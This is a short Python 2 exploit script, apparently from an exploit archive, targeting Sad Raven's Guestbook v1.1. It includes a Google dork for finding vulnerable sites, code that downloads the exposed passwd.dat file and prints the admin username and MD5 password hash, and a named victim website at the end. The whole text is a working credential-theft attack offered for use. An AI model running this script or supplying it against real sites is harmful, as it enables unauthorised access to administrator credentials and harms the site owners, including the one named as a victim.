#!/usr/bin/python #Portal Name: Sad Raven's Guestbook #version: 1.1 #Google Dork: sad Raven's Guestbook #Exploit Coded by: Pouya_Server #Exploit Discovered by: Pouya_Server #Contact Me: Pouya.s3rver@Gmail.com   import urllib import sys import parser serv="http://" i=0 for arg in sys.argv:      i=i+1 if i!=3:  print """\n\n          \tSad Raven's Guestbook v1.1  (passwd.dat)                                     \tUsage:exploit.py [targetsite] [path]           \tExample:exploit.py www.target.com /Path/ \tResult=$Password['Admin']="c71032e32b9ce349f99f655e68d7324g"      \t       $Password['Admin Username']="Admin Password [MD5]" \n\n""" else:         adres=sys.argv[1]     path=sys.argv[2]     str1=adres.join([serv,path])     str2=str1.join(['','/passwd.dat'])     print "\n[~]Connecting..."     url=urllib.urlopen(str2).read();     print "\n[+]Connected!"       test=url.find(path);     t=0;     print "\n\t\t\t-=[Admin Username and Password]=-"     while(url[test+1]!=1): # Pouya_Server               print url[test],               if(url[test]=='\n'):                  t=t+1;                if(t==2):                  break;                               test=test+1;     print "\n\n\t\t\t[ Coded by Pouya_Server ]"     -------------------------------------------------- Victem : http://djnixon.ru/guest/